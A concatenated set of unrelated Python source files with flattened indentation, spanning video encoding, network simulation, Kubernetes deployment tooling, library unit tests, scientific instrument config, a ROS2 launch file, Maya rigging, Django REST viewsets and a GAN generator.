created_muxing = bitmovin.encodings.Muxing.FMP4.create(object_=muxing, encoding_id=encoding.id).resource
video_fmp4_muxings.append({'muxing': created_muxing, 'stream': stream, 'muxing_stream': muxing, 'output': encoding_output})
for audio_muxing_stream in audio_muxing_streams:
stream = audio_muxing_stream['stream']
muxing = audio_muxing_stream['mux']
encoding_output = EncodingOutput(output_id=created_output.id,
output_path=RELATIVE_OUTPUT_PATH + 'audio_dash/{}/'.format(stream.name),
acl=[acl_entry])
stream_array = [muxing]
muxing = FMP4Muxing(segment_length=4,
segment_naming='seg_%number%.m4s',
init_segment_name='init.mp4',
streams=stream_array,
outputs=[encoding_output],
name='dash_audio_muxing_{}'.format(stream.name))
created_muxing = bitmovin.encodings.Muxing.FMP4.create(object_=muxing, encoding_id=encoding.id).resource
audio_fmp4_muxings.append({'muxing': created_muxing, 'stream': stream, 'muxing_stream': muxing,
'output': encoding_output})
bitmovin.encodings.Encoding.start(encoding_id=encoding.id)
try:
bitmovin.encodings.Encoding.wait_until_finished(encoding_id=encoding.id)
except BitmovinError as bitmovin_error:
print('Exception occurred while waiting for encoding to finish: {}'.format(bitmovin_error))
manifest_output = EncodingOutput(output_id=created_output.id,
output_path='{}manifests/'.format(RELATIVE_OUTPUT_PATH),
acl=[acl_entry])
##########################
# dash manifest
dash_manifest = DashManifest(manifest_name='example_manifest_dash.mpd',
outputs=[manifest_output],
name='Sample DASH Manifest')
dash_manifest = bitmovin.manifests.DASH.create(dash_manifest).resource
period = Period()
period = bitmovin.manifests.DASH.add_period(object_=period, manifest_id=dash_manifest.id).resource
video_adaptation_set = VideoAdaptationSet()
video_adaptation_set = bitmovin.manifests.DASH.add_video_adaptation_set(object_=video_adaptation_set,
manifest_id=dash_manifest.id,
period_id=period.id).resource
audio_adaptation_set = AudioAdaptationSet(lang='en')
audio_adaptation_set = bitmovin.manifests.DASH.add_audio_adaptation_set(object_=audio_adaptation_set,
manifest_id=dash_manifest.id,
period_id=period.id).resource
for video_fmp4_muxing in video_fmp4_muxings:
muxing = video_fmp4_muxing['muxing']
encoding_output = video_fmp4_muxing['output']
video_fmp4_representation = FMP4Representation(FMP4RepresentationType.TEMPLATE,
encoding_id=encoding.id,
muxing_id=muxing.id,
segment_path='/{}'.format(encoding_output.outputPath))
video_fmp4_representation = bitmovin.manifests.DASH.add_fmp4_representation(object_=video_fmp4_representation,
manifest_id=dash_manifest.id,
period_id=period.id,
adaptationset_id=video_adaptation_set.id
).resource
for audio_fmp4_muxing in audio_fmp4_muxings:
muxing = audio_fmp4_muxing['muxing']
encoding_output = audio_fmp4_muxing['output']
audio_fmp4_representation = FMP4Representation(FMP4RepresentationType.TEMPLATE,
encoding_id=encoding.id,
muxing_id=muxing.id,
segment_path='/{}'.format(encoding_output.outputPath))
audio_fmp4_representation = bitmovin.manifests.DASH.add_fmp4_representation(object_=audio_fmp4_representation,
manifest_id=dash_manifest.id,
period_id=period.id,
adaptationset_id=audio_adaptation_set.id
).resource
bitmovin.manifests.DASH.start(manifest_id=dash_manifest.id)
try:
bitmovin.manifests.DASH.wait_until_finished(manifest_id=dash_manifest.id)
except BitmovinError as bitmovin_error:
print('Exception occurred while waiting for manifest creation to finish: {}'.format(bitmovin_error))
if __name__ == '__main__':
main()
|
485403
|
import tacoma as tc
import matplotlib.pyplot as pl
from collections import Counter
from itertools import izip
import numpy as np
def get_hist_from_counter(c):
data = np.array(c.items(),dtype=float)
x = data[:,0]
y = data[:,1] / data[:,1].sum()
return x,y
def get_hist_from_list(l,bins=400):
y,x = np.histogram(l,bins=bins)
y = np.array(y,dtype=float)
y /= y.sum()
x = 0.5*(x[:1]+x[:-1])
return x,y
N = 1000
t_sim = 10000*N
t_eq = 10000*N
t_total = t_sim + t_eq
lambda_ = 1.0
b0 = 0.6
b1 = 0.8
plot_size = False
print "simulating"
result = tc.ZSBB_model([],N,lambda_,b0,b1,t_sim,t_equilibration=t_eq,seed=1346,record_sizes_and_durations=True)
print "done"
fig, ax = pl.subplots(1,3,figsize=(12,4))
x,y = get_hist_from_list(np.array(result.contact_durations,dtype=float)/float(N))
#x,y = get_hist_from_counter(Counter(result.contact_durations))
ax[1].plot(x,y,'s')
y2 = (1+x)**(-2*b1-1)
ax[1].plot(x,y2/y2.sum())
x,y = get_hist_from_list(np.array(result.inter_contact_durations,dtype=float)/float(N))
ax[1].plot(x,y,'.')
y2 = (1+x)**(-2*b0-1)
ax[1].plot(x,y2/y2.sum())
ax[1].set_yscale('log')
ax[1].set_xscale('log')
if plot_size:
size_count = Counter(result.initial_size_histogram)
this_count = Counter(size_count)
for ch in result.group_changes:
this_count += Counter(ch)
size_count += this_count
x,y = get_hist_from_counter(size_count)
ax[0].plot(x,y,'s')
ax[0].set_yscale('log')
ax[0].set_xscale('log')
m_edges = 0
ks = []
print len(result.edges_in[0])
print result.edges_in[0]
edges_in = result.edges_in
edges_out = result.edges_out
for e_in,e_out in izip(edges_in,edges_out):
#print ch, e_in, e_out
m_in = len(e_in)
m_out = len(e_out)
m_edges += m_in
m_edges -= m_out
mean_k= 2*m_edges /float(N)
ks.append(mean_k)
t = np.array(result.t,dtype=float)
t /= N
print len(ks), len(result.t)
ax[2].plot(t,ks,'-')
ax[2].plot(np.array([t_eq,t_eq],dtype=float)/N,[0,0.25],'-')
ax[2].set_xscale('log')
pl.show()
|
485406
|
import click
from .base import cluster_command
@cluster_command.command(
add_help_option=False,
context_settings=dict(
allow_interspersed_args=False,
ignore_unknown_options=True,
),
)
@click.pass_context
@click.argument(
"kubectl_arguments",
nargs=-1,
type=click.UNPROCESSED,
)
def kubectl(ctx, kubectl_arguments):
'''Run kubectl with the connected Kubernetes cluster.'''
ctx.obj.controller.exec_kubectl(kubectl_arguments)
|
485420
|
import argparse
import datetime
import glob
import os
import string
import sys
import typing
from deployctl.config import config
from deployctl.shell import kubectl, get_most_recent_tag, image_exists, get_k8s_deployments
KUSTOMIZATION_TEMPLATE = """---
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
bases:
- ../../base
commonLabels:
deployment: '{deployment_name}'
nameSuffix: '-{deployment_name}'
images:
- name: gnomad-reads-server
newName: {reads_server_image_repository}
newTag: '{reads_server_tag}'
- name: gnomad-reads-api
newName: {reads_api_image_repository}
newTag: '{reads_api_tag}'
"""
def deployments_directory() -> str:
path = os.path.realpath(os.path.join(os.path.dirname(__file__), "../../manifests/reads/deployments"))
if not os.path.exists(path):
os.makedirs(path)
return path
def list_deployments() -> None:
print("Local configurations")
print("====================")
paths = reversed(sorted(glob.iglob(f"{deployments_directory()}/*/kustomization.yaml"), key=os.path.getmtime))
for path in paths:
print(os.path.basename(os.path.dirname(path)))
print()
print("Cluster deployments")
print("===================")
for deployment in get_k8s_deployments("component=gnomad-reads"):
print(deployment[len("gnomad-reads-") :])
def create_deployment(name: str, reads_server_tag: str = None, reads_api_tag: str = None) -> None:
if not name:
name = datetime.datetime.now().strftime("%Y%m%d-%H%M")
else:
allowed_characters = set(string.ascii_lowercase) | set(string.digits) | {"-"}
if set(name).difference(allowed_characters):
raise ValueError(f"invalid deployment name '{name}'")
if name == "latest":
raise ValueError("'latest' cannot be used for a deployment name")
deployment_directory = os.path.join(deployments_directory(), name)
if os.path.exists(deployment_directory):
raise RuntimeError(f"deployment '{name}' already exists")
if reads_server_tag:
if not image_exists(config.reads_server_image_repository, reads_server_tag):
raise RuntimeError(f"could not find image {config.reads_server_image_repository}:{reads_server_tag}")
else:
reads_server_tag = get_most_recent_tag(config.reads_server_image_repository)
print(f"No server tag provided, using most recent ({reads_server_tag})")
if reads_api_tag:
if not image_exists(config.reads_api_image_repository, reads_api_tag):
raise RuntimeError(f"could not find image {config.reads_api_image_repository}:{reads_api_tag}")
else:
reads_api_tag = get_most_recent_tag(config.reads_api_image_repository)
print(f"No API tag provided, using most recent ({reads_api_tag})")
os.makedirs(deployment_directory)
with open(os.path.join(deployment_directory, "kustomization.yaml"), "w") as kustomization_file:
kustomization = KUSTOMIZATION_TEMPLATE.format(
deployment_name=name,
reads_server_image_repository=config.reads_server_image_repository,
reads_server_tag=reads_server_tag,
reads_api_image_repository=config.reads_api_image_repository,
reads_api_tag=reads_api_tag,
)
kustomization_file.write(kustomization)
print(f"configured deployment '{name}'")
def apply_deployment(name: str) -> None:
deployment_directory = os.path.join(deployments_directory(), name)
if not os.path.exists(deployment_directory):
raise RuntimeError(f"no configuration for deployment '{name}'")
kubectl(["apply", "-k", deployment_directory])
def delete_deployment(name: str, clean: bool = False) -> None:
deployment_directory = os.path.join(deployments_directory(), name)
if os.path.exists(deployment_directory):
kubectl(["delete", "-k", deployment_directory])
if clean:
clean_deployment(name)
else:
create_deployment(name)
delete_deployment(name, clean=True)
def clean_deployment(name: str) -> None:
deployment_directory = os.path.join(deployments_directory(), name)
os.remove(os.path.join(deployment_directory, "kustomization.yaml"))
os.rmdir(deployment_directory)
def main(argv: typing.List[str]) -> None:
parser = argparse.ArgumentParser(prog="deployctl")
subparsers = parser.add_subparsers()
list_parser = subparsers.add_parser("list")
list_parser.set_defaults(action=list_deployments)
create_parser = subparsers.add_parser("create")
create_parser.set_defaults(action=create_deployment)
create_parser.add_argument("--name")
create_parser.add_argument("--server-tag", dest="reads_server_tag")
create_parser.add_argument("--api-tag", dest="reads_api_tag")
apply_parser = subparsers.add_parser("apply")
apply_parser.set_defaults(action=apply_deployment)
apply_parser.add_argument("name")
delete_parser = subparsers.add_parser("delete")
delete_parser.set_defaults(action=delete_deployment)
delete_parser.add_argument("name")
delete_parser.add_argument("--clean", action="store_true")
clean_parser = subparsers.add_parser("clean")
clean_parser.set_defaults(action=clean_deployment)
clean_parser.add_argument("name")
args = parser.parse_args(argv)
if "action" not in args:
parser.print_usage()
sys.exit(1)
action = args.action
del args.action
try:
action(**vars(args))
except Exception as err: # pylint: disable=broad-except
print(f"Error: {err}", file=sys.stderr)
sys.exit(1)
|
485448
|
from datetime import date, datetime
from decimal import Decimal
from convtools import conversion as c
def test_pipes():
assert c.list_comp(c.inline_expr("{0} ** 2").pass_args(c.this)).pipe(
c.call_func(sum, c.this)
).pipe(
c.call_func(
lambda x, a: x + a,
c.this,
c.naive({"abc": 10}).item(c.input_arg("key_name")),
)
).pipe(
[c.this, c.this]
).execute(
[1, 2, 3], key_name="abc", debug=False
) == [
24,
24,
]
assert c.item(0).pipe(datetime.strptime, "%Y-%m-%d").pipe(
c.call_func(lambda dt: dt.date(), c.this)
).execute(["2019-01-01"], debug=False) == date(2019, 1, 1)
assert c.item(0).pipe(datetime.strptime, "%Y-%m-%d").pipe(
c.this.call_method("date")
).execute(["2019-01-01"], debug=False) == date(2019, 1, 1)
conv = c.dict_comp(
c.item("name"),
c.item("transactions").pipe(
c.list_comp(
{
"id": c.item(0).as_type(str),
"amount": c.item(1).pipe(
c.if_(c.this, c.this.as_type(Decimal), None)
),
}
)
),
).gen_converter(debug=False)
assert conv([{"name": "test", "transactions": [(0, 0), (1, 10)]}]) == {
"test": [
{"id": "0", "amount": None},
{"id": "1", "amount": Decimal("10")},
]
}
assert c.this.pipe(lambda it: it).filter(c.this).sort().as_type(
list
).execute((2, 1, 0)) == [1, 2]
def test_pipe_single_call_functions():
class CustomException(Exception):
pass
def one_off_func():
if one_off_func.first:
one_off_func.first = False
return 1
raise CustomException
one_off_func.first = True
assert (
c.list_comp(
c.call_func(one_off_func).pipe(
(
c.this + 1,
c.this + 2,
)
)
).gen_converter(debug=False)([1])
== [(2, 3)]
)
def test_pipe_conversion():
from convtools import conversion as c
from convtools.base import PipeConversion
assert PipeConversion(c.naive([1, 2, 3]), c.item(1)).execute(None) == 2
assert (
PipeConversion(c.item("key1"), c.item("key2")).execute(
{"key1": {"key2": 3}}, debug=False
)
== 3
)
assert (
c.this.pipe(c.list_comp(c.this + 1))
.filter(c.this > 3)
.execute([1, 2, 3, 4, 5, 6], debug=False)
) == [4, 5, 6, 7]
c.aggregate(
c.ReduceFuncs.Array(c.item("key"), default=list).pipe(
c.if_(
c.call_func(any, c.generator_comp(c.this.is_(None))),
c.call_func(list),
c.this,
)
)
).gen_converter(debug=False)
def test_iter_method():
assert (
c.this.iter(c.this * 3)
.filter(c.this)
.as_type(list)
.execute(
[1, 2, 3, 0, 1],
debug=False,
)
== [3, 6, 9, 3]
)
assert c.group_by(c.item(0)).aggregate(
c(
[
c.item(0),
c.item(1).pipe(c.ReduceFuncs.Max(c.this)),
]
)
.iter(c.this * 100)
.as_type(tuple)
).execute([(0, 1), (0, 2), (1, 7)], debug=False) == [
(0, 200),
(100, 700),
]
def test_pipe_filter_sort():
assert (
c.this.as_type(list)
.pipe(c.iter(c.this + 1))
.filter(c.this > 3)
.sort(key=lambda x: x, reverse=True)
.execute(range(7), debug=False)
) == [7, 6, 5, 4]
assert c.this.sort().execute([3, 1, 2]) == [1, 2, 3]
def test_pipe_label_args():
assert (
c.this.pipe(
c.this,
label_input={"label1": c.input_arg("abc")},
label_output={"label2": c.input_arg("cde")},
).execute(None, abc=1, cde=2)
is None
)
|
485515
|
from unittest import mock
from crowdin_api.api_resources import StoragesResource
from crowdin_api.requester import APIRequester
class TestStoragesResource:
resource_class = StoragesResource
def get_resource(self, base_absolut_url):
return self.resource_class(requester=APIRequester(base_url=base_absolut_url))
@mock.patch("crowdin_api.requester.APIRequester.request")
def test_list_storages(self, m_request, base_absolut_url):
m_request.return_value = "response"
resource = self.get_resource(base_absolut_url)
assert resource.list_storages(page=10) == "response"
m_request.assert_called_once_with(
method="get",
params=resource.get_page_params(page=10, offset=None, limit=None),
path="storages",
)
@mock.patch("crowdin_api.requester.APIRequester.request")
def test_add_storage(self, m_request, base_absolut_url):
m_request.return_value = "response"
resource = self.get_resource(base_absolut_url)
assert resource.add_storage("SOME_FILE") == "response"
m_request.assert_called_once_with(method="post", path="storages", file="SOME_FILE")
@mock.patch("crowdin_api.requester.APIRequester.request")
def test_get_storage(self, m_request, base_absolut_url):
m_request.return_value = "response"
resource = self.get_resource(base_absolut_url)
assert resource.get_storage(storageId=1) == "response"
m_request.assert_called_once_with(method="get", path="storages/1")
@mock.patch("crowdin_api.requester.APIRequester.request")
def test_delete_storage(self, m_request, base_absolut_url):
m_request.return_value = "response"
resource = self.get_resource(base_absolut_url)
assert resource.delete_storage(storageId=1) == "response"
m_request.assert_called_once_with(method="delete", path="storages/1")
|
485547
|
class InvalidRequestObject(object):
def __init__(self):
self.errors = list()
def __nonzero__(self):
return False
__bool__ = __nonzero__
def add_error(self, parameter, value):
self.errors.append({'parameter': parameter, 'message': value})
def has_errors(self):
return bool(len(self.errors))
class ValidRequestObject(object):
def __nonzero__(self):
return True
__bool__ = __nonzero__
@classmethod
def from_dict(cls, adict):
raise NotImplementedError
|
485562
|
import matplotlib
import pytest
import plotly.graph_objects as go
from data_describe.core.time import (
_pandas_compute_stationarity_test,
adf_test,
kpss_test,
_pandas_compute_decompose_timeseries,
_pandas_compute_autocorrelation,
plot_autocorrelation,
stationarity_test,
)
import data_describe as dd
from data_describe.compat import _is_dataframe
matplotlib.use("Agg")
def test_plot_unsupported(compute_time_data):
with pytest.raises(ValueError):
dd.plot_time_series("this_is_a_string", col="var")
with pytest.raises(ValueError):
dd.plot_time_series(df=compute_time_data, col=1, decompose=True)
def test_stationarity_unsupported(compute_time_data):
with pytest.raises(ValueError):
_pandas_compute_stationarity_test(
compute_time_data["var"], test="not a valid test"
)
with pytest.raises(ValueError):
stationarity_test(compute_time_data, col=["var"])
with pytest.raises(ValueError):
stationarity_test("Not a dataframe", col=["var"])
def test_pandas_compute_stationarity_test(compute_time_data):
test_df = _pandas_compute_stationarity_test(
compute_time_data["var"], test="dickey-fuller"
)
assert _is_dataframe(test_df)
assert test_df.shape == (7, 1)
test_df = _pandas_compute_stationarity_test(compute_time_data["var"], test="kpss")
assert _is_dataframe(test_df)
assert test_df.shape == (7, 1)
def test_adf_test(compute_time_data):
df = adf_test(compute_time_data["var"])
adf_idx = [
"Test Statistic",
"p-value",
"Lags Used",
"Number of Observations Used",
"Critical Value (1%)",
"Critical Value (5%)",
"Critical Value (10%)",
]
assert df.shape == (7, 1)
assert df.index.tolist() == adf_idx
assert df.columns[0] == "stats"
def test_kpss_test(compute_time_data):
df = kpss_test(compute_time_data["var"])
kpss_idx = [
"Test Statistic",
"p-value",
"Lags Used",
"Critical Value (10%)",
"Critical Value (5%)",
"Critical Value (2.5%)",
"Critical Value (1%)",
]
assert df.shape == (7, 1)
assert df.index.tolist() == kpss_idx
assert df.columns[0] == "stats"
def test_decompose_timeseries(_statsmodels, compute_time_data):
result = _pandas_compute_decompose_timeseries(
compute_time_data, col="var", model="additive"
)
assert isinstance(result, _statsmodels.tsa.seasonal.DecomposeResult)
assert len(result.trend) == 15
assert len(result.observed) == 15
assert len(result.seasonal) == 15
assert len(result.resid) == 15
def test_pandas_compute_autocorrelation(compute_time_data):
data, white_noise = _pandas_compute_autocorrelation(
compute_time_data["var"], n_lags=1, plot_type="pacf"
)
assert len(data) == 2
assert isinstance(white_noise, float)
data, white_noise = _pandas_compute_autocorrelation(
compute_time_data["var"], n_lags=1, plot_type="acf", fft=False
)
assert len(data) == 15
assert isinstance(white_noise, float)
# NOTE: decomposition object in modin does not preserve index
def test_plotly(compute_time_data):
fig = dd.plot_time_series(
compute_time_data, col="var", viz_backend="plotly", model="additive"
)
assert isinstance(fig, go.Figure)
fig = dd.plot_time_series(
compute_time_data, col=["var"], viz_backend="plotly", model="additive"
)
assert isinstance(fig, go.Figure)
fig = dd.plot_time_series(
compute_time_data,
col="var",
decompose=True,
model="additive",
viz_backend="plotly",
)
assert isinstance(fig, go.Figure)
fig = plot_autocorrelation(
compute_time_data,
col="var",
n_lags=1,
plot_type="acf",
fft=False,
viz_backend="plotly",
)
assert isinstance(fig, go.Figure)
fig = plot_autocorrelation(
compute_time_data, col="var", n_lags=1, plot_type="pacf", viz_backend="plotly"
)
assert isinstance(fig, go.Figure)
def test_seaborn(compute_time_data):
fig = dd.plot_time_series(compute_time_data, col="var")
assert isinstance(fig, matplotlib.artist.Artist)
fig = dd.plot_time_series(
compute_time_data, col="var", decompose=True, model="additive"
)
assert isinstance(fig, matplotlib.artist.Artist)
fig = plot_autocorrelation(compute_time_data, col="var", n_lags=1, plot_type="pacf")
assert isinstance(fig, matplotlib.figure.Figure)
|
485565
|
description = 'Multi tomo setup with four motors in Experimental Chamber 1, currently only 3 motors implemented'
group = 'optional'
tango_base = 'tango://antareshw.antares.frm2.tum.de:10000/antares/'
devices = dict(
sry_multi_1 = device('nicos.devices.entangle.Motor',
description = 'Multitomo sample rotation 1',
tangodevice = tango_base + 'copley/m01',
abslimits = (-400, 400),
),
sry_multi_2 = device('nicos.devices.entangle.Motor',
description = 'Multitomo sample rotation 2',
tangodevice = tango_base + 'copley/m02',
abslimits = (-400, 400),
),
sry_multi_3 = device('nicos.devices.entangle.Motor',
description = 'Multitomo sample rotation 3',
tangodevice = tango_base + 'copley/m03',
abslimits = (-400, 400),
),
# sry_multi_4 = device('nicos.devices.entangle.Motor',
# description = 'Multitomo sample rotation 4',
# tangodevice = tango_base + 'copley/m04',
# abslimits = (-400, 400),
# ),
)
|
485578
|
from launch import LaunchDescription
from launch_ros.actions import Node
from launch.substitutions import LaunchConfiguration
from launch.actions import DeclareLaunchArgument
def generate_launch_description():
test_var = LaunchConfiguration("test_var", default="A_param_value")
return LaunchDescription([
DeclareLaunchArgument(
"test_var",
default_value=test_var,
description="This is the test variable to be sent into node parameter"
),
Node(
package='learning_ros2_launch_by_example',
executable='learning_ros2_launch_by_example_node',
name='parameter_test',
output="screen",
parameters=[{"test_param_value": test_var}]
),
])
|
485585
|
from maya import cmds
from maya.api import OpenMaya
from maya.api import OpenMayaAnim
from skinning.utils import api
from skinning.utils import math
from skinning.utils import skin
from skinning.utils import decorator
__all__ = [
"create_projection_plane"
]
AXIS = {
"x": OpenMaya.MVector(1, 0, 0),
"y": OpenMaya.MVector(0, 1, 0),
"z": OpenMaya.MVector(0, 0, 1),
}
@decorator.preserve_selection
def create_projection_plane(joints, name=None, axis="z", width=25, padding=0, offset=0):
"""
Create a projector plane for the given influences. The points of the
plane are calculated using the provided width and axis. After that a
skin cluster is created.
:param list[str] joints:
:param str/None name:
:param str axis:
:param int/float width:
:param int padding:
:param int offset:
:return: Projection plane
:rtype: str
:raise ValueError: When not more than 2 influences is provided
:raise ValueError: When axis is not valid.
"""
num = len(joints)
if num < 2:
raise ValueError("Projection plane can only be created "
"when providing at least 2 joints.")
elif axis not in AXIS:
raise ValueError("Provided axis '{}' is not valid, "
"options are; {}.".format(axis, list(AXIS.keys())))
name = name or "projector#"
plane = cmds.polyPlane(subdivisionsX=1, subdivisionsY=num - 1, constructionHistory=False, name=name)[0]
matrices = [OpenMaya.MMatrix(cmds.xform(node, query=True, worldSpace=True, matrix=True)) for node in joints]
weights = OpenMaya.MDoubleArray()
influences = OpenMaya.MIntArray(range(num))
# calculate new matrices by blending matrices using the provided padding.
# this will ensure a smoother rotational transition between joints.
if padding > 0:
matrices_padded = []
for i, matrix in enumerate(matrices):
matrix = OpenMaya.MTransformationMatrix(matrix)
translation = matrix.translation(OpenMaya.MSpace.kWorld)
padding_value = min([min([i, padding]), min([num - i - 1, num - padding])])
matrix_padding = [matrices[j] for j in range(i - padding_value, i + padding_value + 1) if 0 <= j < num]
matrix_average = math.average_matrix(matrix_padding)
matrix_average = OpenMaya.MTransformationMatrix(matrix_average)
matrix_average = OpenMaya.MTransformationMatrix(matrix_average.asRotateMatrix())
matrix_average.setTranslation(translation, OpenMaya.MSpace.kWorld)
matrix_average.setScale(OpenMaya.MVector(1, 1, 1), OpenMaya.MSpace.kWorld)
matrices_padded.append(matrix_average.asMatrix())
matrices = matrices_padded
# position plane vertices
for i, matrix in enumerate(matrices):
for j, multiplier in enumerate([-1, 1]):
vertex = (i * 2) + j
point = OpenMaya.MPoint(AXIS[axis] * width * multiplier) * matrix
cmds.xform("{}.vtx[{}]".format(plane, vertex), translation=list(point)[:3])
influence = min([max([0, i - offset]), num - 1])
for k in range(num):
weights.append(int(influence == k))
# create skin cluster
skin_cluster = cmds.skinCluster(
joints,
plane,
name="{}_SK".format(name),
toSelectedBones=True,
removeUnusedInfluence=False,
maximumInfluences=4,
obeyMaxInfluences=True,
bindMethod=0,
skinMethod=0, # linear
normalizeWeights=1, # interactive
weightDistribution=0, # distance
)[0]
# set weights
dag, component = api.conversion.get_component(plane)
skin_cluster_obj = api.conversion.get_object(skin_cluster)
skin_cluster_fn = OpenMayaAnim.MFnSkinCluster(skin_cluster_obj)
skin.set_weights(skin_cluster_fn, dag, component, influences, weights,)
|
485607
|
from django.contrib.auth.models import Group
from django.contrib.auth.models import User as AuthUser
from rest_framework import permissions, viewsets
from core.models import (
AssignedData,
Data,
DataLabel,
DataPrediction,
Label,
Model,
Profile,
Project,
Queue,
)
from core.pagination import SmartPagination
from core.serializers import (
AssignedDataSerializer,
AuthUserGroupSerializer,
AuthUserSerializer,
CoreModelSerializer,
DataLabelSerializer,
DataPredictionSerializer,
DataSerializer,
LabelSerializer,
ProfileSerializer,
ProjectSerializer,
QueueSerializer,
)
# TODO establish more restrictive permissions
# AuthUsers should be write-only for unauthenticated users
# Creation/update/deletion of certain objects that will be
# managed by the server probably shouldn't be exposed via the API
# (ex. Queues, Models, AssignedData, many-to-many join fields)
class ProfileViewSet(viewsets.ModelViewSet):
queryset = Profile.objects.all().order_by("id")
serializer_class = ProfileSerializer
permission_classes = (permissions.IsAuthenticated,)
class AuthUserGroupViewSet(viewsets.ModelViewSet):
queryset = Group.objects.all().order_by("id")
serializer_class = AuthUserGroupSerializer
permission_classes = (permissions.IsAuthenticated,)
class AuthUserViewSet(viewsets.ModelViewSet):
queryset = AuthUser.objects.all().order_by("id")
serializer_class = AuthUserSerializer
permission_classes = (permissions.IsAuthenticated,)
class ProjectViewSet(viewsets.ModelViewSet):
queryset = Project.objects.all().order_by("id")
serializer_class = ProjectSerializer
permission_classes = (permissions.IsAuthenticated,)
class CoreModelViewSet(viewsets.ModelViewSet):
queryset = Model.objects.all().order_by("id")
serializer_class = CoreModelSerializer
permission_classes = (permissions.IsAuthenticated,)
class DataViewSet(viewsets.ModelViewSet):
queryset = Data.objects.all().order_by("id")
serializer_class = DataSerializer
permission_classes = (permissions.IsAuthenticated,)
pagination_class = SmartPagination
class LabelViewSet(viewsets.ModelViewSet):
queryset = Label.objects.all().order_by("id")
serializer_class = LabelSerializer
permission_classes = (permissions.IsAuthenticated,)
class DataLabelViewSet(viewsets.ModelViewSet):
queryset = DataLabel.objects.all().order_by("id")
serializer_class = DataLabelSerializer
permission_classes = (permissions.IsAuthenticated,)
class DataPredictionViewSet(viewsets.ModelViewSet):
queryset = DataPrediction.objects.all().order_by("id")
serializer_class = DataPredictionSerializer
permission_classes = (permissions.IsAuthenticated,)
class QueueViewSet(viewsets.ModelViewSet):
queryset = Queue.objects.all().order_by("id")
serializer_class = QueueSerializer
permission_classes = (permissions.IsAuthenticated,)
class AssignedDataViewSet(viewsets.ModelViewSet):
queryset = AssignedData.objects.all().order_by("id")
serializer_class = AssignedDataSerializer
permission_classes = (permissions.IsAuthenticated,)
|
485633
|
from typing import List, Tuple
import copy
import torch
import torchelie.nn as tnn
import torchelie.utils as tu
import torch.nn as nn
class Pix2PixHDGlobalGenerator(tnn.CondSeq):
"""
Residual generator used in `Pix2PixHD <https://arxiv.org/abs/1711.11585>`_
.
:code:`arch` is a list of strings representing blocks.
For example, this creates a first conv with 32 output channels, 3
downsampling stride 2 convs that double the number of channels, 5 residual
blocks, 3 upsampling convs halving the number of channels, and a final conv
that converts back to RGB.
:code:```
Pix2PixHDGlobalGenerator(['32', 'd128', 'd512', 'd512', 'R512', 'R512',
'R512', 'R512', 'R512', 'u512', 'u512', 'u128'])
```
"""
def __init__(self, arch: List[str]) -> None:
super().__init__()
self.arch = arch
self.to_standard_arch()
def to_standard_arch(self):
self._modules.clear()
arch = self.arch
self.input = tnn.ConvBlock(3, int(arch[0]), 3)
ch, i = int(arch[0]), 1
ii = 0
self.encode = tnn.CondSeq()
while arch[i][0] == 'd':
out_ch = int(arch[i][1:])
self.encode.add_module(f'conv_{ii}',
tnn.ConvBlock(ch, out_ch, 3, stride=2))
ch = out_ch
i += 1
ii += 1
ii = 0
self.transform = tnn.CondSeq()
while arch[i][0] == 'R':
out_ch = int(arch[i][1:])
resblock = tnn.PreactResBlock(ch, out_ch)
tnn.utils.insert_after(resblock.branch, 'bn1',
tnn.Noise(1, inplace=False), 'noise')
self.transform.add_module(f'transform_{ii}', resblock)
ch = out_ch
i += 1
ii += 1
self.transform.add_module('norm', nn.InstanceNorm2d(ch))
self.transform.add_module('relu', nn.ReLU(True))
self.transform[0].preact_skip()
ii = 0
self.decode = tnn.CondSeq()
while i < len(arch) and arch[i][0] == 'u':
out_ch = int(arch[i][1:])
convblock = tnn.ConvBlock(ch, out_ch, 3, stride=1).add_upsampling()
self.decode.add_module(f'out_conv_{ii}', convblock)
tnn.utils.insert_after(convblock, 'norm',
tnn.Noise(1, inplace=True), 'noise')
ch = out_ch
i += 1
ii += 1
self.to_rgb = tnn.ConvBlock(out_ch, 3, 3).remove_batchnorm()
self.to_rgb.relu = nn.Sigmoid()
def to_instance_norm(m):
if isinstance(m, nn.BatchNorm2d):
return nn.InstanceNorm2d(m.num_features, affine=True)
if isinstance(m, nn.Conv2d):
m.padding_mode = 'reflect'
return m
tnn.utils.edit_model(self, to_instance_norm)
def leaky(self) -> 'Pix2PixHDGlobalGenerator':
tnn.utils.make_leaky(self)
return self
def to_unet(self) -> 'Pix2PixHDGlobalGenerator':
self._modules.clear()
arch = self.arch
ch = int(self.arch[0])
self.input = tnn.ConvBlock(33, int(arch[0]), 7)
def _build(i, prev_ch):
ch = int(arch[i][1:])
if arch[i][0] == 'R':
transforms = tnn.CondSeq()
transforms.in_channels = prev_ch
ii = 0
while arch[i][0] == 'R':
ch = int(arch[i][1:])
transforms.add_module(f'transform_{ii}',
tnn.PreactResBlock(prev_ch, ch))
prev_ch = ch
i += 1
ii += 1
transforms.out_channels = ch
transforms.add_module('norm', nn.InstanceNorm2d(ch))
transforms.add_module('relu', nn.ReLU(True))
transforms[0].preact_skip()
return transforms
if arch[i][0] == 'd':
u = tnn.encdec.UBlock(prev_ch, ch, _build(i + 1, ch))
u.to_bilinear_sampling()
u.set_decoder_num_layers(1).set_encoder_num_layers(1)
return u
self.encdec = _build(1, ch)
self.to_rgb = tnn.ConvBlock(ch, 3, 3).remove_batchnorm()
self.to_rgb.relu = nn.Sigmoid()
def to_instance_norm(m):
if isinstance(m, nn.BatchNorm2d):
return nn.InstanceNorm2d(m.num_features, affine=True)
if isinstance(m, nn.Conv2d):
m.padding_mode = 'reflect'
return m
tnn.utils.edit_model(self, to_instance_norm)
return self
def to_equal_lr(self, leak=0.) -> 'Pix2PixHDGlobalGenerator':
tnn.utils.net_to_equal_lr(self, leak=leak)
for m in self.modules():
if isinstance(m, tnn.PreactResBlock):
pass
return self
@tu.experimental
def pix2pixhd() -> Pix2PixHDGlobalGenerator:
return Pix2PixHDGlobalGenerator(['64', 'd128', 'd256', 'd512', 'd1024'] +
['R1024'] * 10 +
['u1024', 'u512', 'u256', 'u128'])
def pix2pixhd_dev() -> Pix2PixHDGlobalGenerator:
return Pix2PixHDGlobalGenerator(['64', 'd128', 'd256', 'd512'] +
['R512'] * 10 + ['u512', 'u256', 'u128'])
@tu.experimental
def pix2pixhd_res_dev() -> Pix2PixHDGlobalGenerator:
return Pix2PixHDGlobalGenerator(['8', 'd16', 'd32', 'd64', 'd128', 'd256'] +
['R256'] * 10 +
['u256', 'u128', 'u64', 'u32', 'u16'])
class MultiScaleDiscriminator(nn.Module):
